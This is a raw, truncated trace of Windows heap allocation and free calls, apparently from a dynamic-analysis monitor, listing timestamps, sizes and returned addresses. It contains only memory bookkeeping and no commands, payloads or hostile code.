[0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d35d0 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30a8 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35a0 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d35a0 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d35e8 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35b8 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d35b8 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3600 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100) returned 0x8d38c8 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3440 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3618 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6598 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3630 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c65c0 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30b8 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6598 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3648 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3660 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3630 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3630 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2) returned 0x8d30c8 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3678 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3690 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30d8 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d30c8 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d36a8 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d36c0 [0150.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3678 | out: hHeap=0x8a0000) returned 1 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3678 [0150.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1c) returned 0x8c6598 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d36d8 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c65e8 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30c8 [0150.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6598 | out: hHeap=0x8a0000) returned 1 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d36f0 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3708 [0150.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36d8 | out: hHeap=0x8a0000) returned 1 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d36d8 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3720 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3738 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3750 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3768 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xac) returned 0x8d39d0 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3780 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3798 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d37b0 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d37c8 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d37e0 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d37f8 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3810 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3828 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3840 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3858 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3870 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3888 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d38a0 [0150.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3aa0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3ab8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3ad0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3ae8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3b00 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3b18 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3b30 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3b48 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3b60 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3b78 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3b90 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3ba8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3bc0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3bd8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3bf0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3c08 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3c20 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3c38 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3c50 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3c68 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3c80 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3c98 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3cb0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3cc8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3ce0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3cf8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3d10 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3d28 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3d40 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3d58 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3d70 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3d88 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3da0 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3db8 [0150.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3dd0 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3de8 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3e00 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3e18 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3e30 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3e48 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3e60 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3ea0 [0150.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3eb8 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca678 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca738 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca720 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca708 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca798 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca750 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca768 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca7f8 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca7b0 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca7c8 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca858 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca840 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8a0 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca888 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca870 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8b8 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8d0 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca930 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8e8 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca900 | out: hHeap=0x8a0000) returned 1 [0150.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca948 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca960 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca9c0 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca978 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca990 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca9d8 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca9f0 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d34e0 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa08 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa20 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d34f8 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3510 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3558 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3540 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3528 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3570 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3588 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35e8 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35a0 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d35b8 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3600 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3618 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3660 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3648 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3630 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36c0 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36a8 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3678 | out: hHeap=0x8a0000) returned 1 [0150.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3708 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36f0 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36d8 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3720 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3738 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3750 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3768 | out: hHeap=0x8a0000) returned 1 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3768 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3750 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30e8 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3750 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d30e8 | out: hHeap=0x8a0000) returned 1 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3768 | out: hHeap=0x8a0000) returned 1 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3768 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x8ca5b0 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3750 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6598 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30e8 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3738 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3720 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3750 | out: hHeap=0x8a0000) returned 1 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3750 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6610 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d36d8 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d36f0 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3708 [0150.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3678 [0150.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3768 | out: hHeap=0x8a0000) returned 1 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3720 | out: hHeap=0x8a0000) returned 1 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3738 | out: hHeap=0x8a0000) returned 1 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3750 | out: hHeap=0x8a0000) returned 1 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6) returned 0x8d30f8 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3750 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3108 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3750 | out: hHeap=0x8a0000) returned 1 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d30f8 | out: hHeap=0x8a0000) returned 1 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3750 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3738 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3720 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3768 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d30f8 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3738 | out: hHeap=0x8a0000) returned 1 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3738 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d36a8 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3720 | out: hHeap=0x8a0000) returned 1 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3720 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3108 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d36c0 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3630 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3118 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3648 [0150.670] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3660 [0150.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36c0 | out: hHeap=0x8a0000) returned 1 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x8d36c0 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3618 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3108 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3618 | out: hHeap=0x8a0000) returned 1 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d36c0 | out: hHeap=0x8a0000) returned 1 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d36c0 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x8d3618 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3600 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3108 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3600 | out: hHeap=0x8a0000) returned 1 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3618 | out: hHeap=0x8a0000) returned 1 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3618 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12) returned 0x8ca5b0 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6638 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3108 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6638 | out: hHeap=0x8a0000) returned 1 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3600 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d35b8 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d35a0 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d35e8 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3588 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3570 [0150.671] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2) returned 0x8d3108 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3528 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3540 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3128 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3108 | out: hHeap=0x8a0000) returned 1 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3558 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3510 [0150.672] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3528 | out: hHeap=0x8a0000) returned 1 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3528 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d34f8 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3c) returned 0x8b2258 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d34e0 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3ed0 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3ee8 [0150.672] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3f00 [0150.672] RtlAllocateHeap 